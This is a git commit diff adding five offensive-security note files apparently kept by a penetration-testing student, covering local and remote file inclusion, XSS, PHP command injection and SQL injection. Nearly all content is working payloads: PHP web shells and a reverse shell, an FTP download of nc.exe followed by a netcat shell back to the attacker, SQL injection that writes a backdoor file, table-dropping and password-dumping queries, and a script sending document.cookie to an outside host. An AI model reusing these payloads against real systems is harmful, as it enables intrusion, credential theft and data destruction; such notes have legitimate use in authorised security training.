note updates

master
51x 2017-01-16 21:52:08 +01:00
parent fefa6e6bb7
commit 1ec27c494c
5 changed files with 112 additions and 0 deletions

View File

@ -0,0 +1,41 @@
Local File Inclusion
====================
The %00 make php 5.3 and below ignore everything after that.
Testing: http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&LANG=en../../../../../windows/system32/drivers/etc/hosts%00
...then let's add code to the access log :)
~# nc 192.168.1.1 80
<?php echo shell_exec($_GET['cmd']);?>
...and use it
http://192.168.1.1/addguestbook.php?name=dfjfgjhytry&comment=&cmd=ipconfig&LANG=en../../../../../../xampp/apache/logs/access.log%00
...or php shell on linux:)
<?php $s=fsockopen("10.0.0.1",1234);exec("sh<&3>&3 2>&3");?>
...finally send the requests to nc and exploit:
# Windows FTP upload
echo open 192.168.1.1 21 > ftp.txt && echo haxy>> ftp.txt && echo haxy >> ftp.txt && echo bin >> ftp.txt && echo GET nc.exe >> ftp.txt && echo bye >> ftp.txt && ftp -s:ftp.txt
nc.exe -e cmd.exe 192.168.1.1  31337
- - - - - - - -
<? system('echo open 192.168.1.1 21 > ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo haxor >> ftp.txt'); ?>
<? system('echo bin >> ftp.txt'); ?>
<? system('echo GET nc.exe >> ftp.txt'); ?>
<? system('echo bye >> ftp.txt'); ?>
<? system('ftp -s:ftp.txt'); ?>
<? system('nc.exe -e cmd.exe 192.168.1.1  31337'); ?>
<?php phpinfo()?>
<? system("cat /etc/passwd"); ?>
<?php echo shell_exec($_GET["cmd"]);?>
<?php include="124.1.1.1" ?>
Remote file Inclusion
=====================
Example: http://192.168.1.1/add.php?name=asdasd&LANG=http://192.168.1.1/login.txt%00
Note: the login.txt contains

View File

@ -0,0 +1,14 @@
XSS locator
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
XSS locator 2
'';!--"<XSS>=&{()}
<img src="//" onerror=alert(document.cookie);>
Other fuzzing char list
><>)()}{}][]'"`;--..\/\\//../~=-1!--?||*&&%00%0a%0d\r\n#><>}{}

View File

@ -0,0 +1,11 @@
PHP command injection
=====================
There are just some ideas.
<? system('apt-get install netcat -y'); ?>
<? system('netcat 14.5.1.44 8080'); ?>
<? system('wget http://14.5.1.44:8080/'); ?>
<? system('init 6'); ?>

View File

@ -0,0 +1,43 @@
SQLi notes
==========
Login bypass
any' or 1=1 limit 1 ;#
' OR '1' = '1 / ' OR '1' = '1
;# ;-- #
?id=737 order by 6 --> Testing max columns
?id=737 union select all 1,2,3,4,5,6 --> Testing max columns in database
?id=737 union select all 1,2,3,4,@@version,6 --> Version enumeration, commands to run or exploits?
?id=737 union select all 1,2,3,4,table_name,6 FROM information_schema.tables --> Table enumeration
?id=737 union select all 1,2,3,4,column_name,6 FROM information_schema.columns where table_name='user' --> Column enumeration
?id=737 union select 1,2,3,4,concat(name,0x3a,password ),6 FROM users --> After knowing about "users" pull out the info
More examples
x%') #
x%') or 1=1 #
x%') order by 4 #
x%') union select all 4 #
x%') union select all 1,2,3@@version #
x%') and 1=1 #
x%') and UNION ALL SELECT LOAD_FILE(/etc/passwd) #
x%') and drop table if exists customers #
x%') and create database test #
x%') ; DROP ALL TABLES; #
@@hostname
wget -qO- http://www.site.com --user-agent=useragent --post-data="key=value"
Adding backdor.php
?id=737 union select all 1,2,3,4,"<?php echo shell_exec($_GET['cmd']);?>",6 into OUTFILE 'c:/xampp/htdocs/backdoor.php'
Getting a shell with php execute
192.168.3.1/comment.php?id=737 union select all 1,2,3,4,"<? system('echo open 192.168.1.9 21 > ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo haxor>> ftp.txt'); ?><? system('echo bin >> ftp.txt'); ?><? system('echo GET nc.exe >> ftp.txt'); ?><? system('echo bye >> ftp.txt'); ?>",6 into OUTFILE 'c:/xampp/htdocs/makeftp12.php'

View File

@ -0,0 +1,3 @@
<script>new Image().src="http://192.168.1.1/bogus.php?output="+document.cookie;</script>